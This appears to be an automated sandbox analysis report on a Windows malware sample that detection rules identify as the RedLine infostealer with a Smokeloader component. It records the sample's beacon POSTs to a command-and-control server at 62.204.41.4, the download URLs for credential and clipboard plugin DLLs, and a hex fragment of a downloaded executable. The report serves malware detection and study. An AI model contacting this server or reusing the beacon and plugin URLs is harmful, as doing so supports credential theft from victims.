                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:57:03 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                            Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php(l
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php4
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php5342a2
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php8
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php9e5342a2
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpC
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpH
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpR
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpZI
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa106e76
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpd
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpi
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpion
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpix
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpm32
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpn
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpoft
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpp
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe#
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe=
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exel
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phps
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008C86E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:57:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: xriv.exe, 00000006.00000002.365562441.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                            System Summary

                            barindex
                            Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00073BA2
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00075C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01083BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01085C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00408C60
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040DC11
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00407C3F
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00418CCC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00406CA0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004028B0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0041A4BE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00418244
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00401650
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00402F20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004193C4
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00418788
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00402F89
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00402B90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004073A0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058786D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005818B7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005831F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005989EF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00583187
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00582B17
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005984AB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00582DF7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058DE78
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00588EC7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00587EA6
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00586F07
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00598F33
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0059A725
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005877D9
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_02130DB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_02130DAC
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008E8530
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008E754D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008C6F40
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
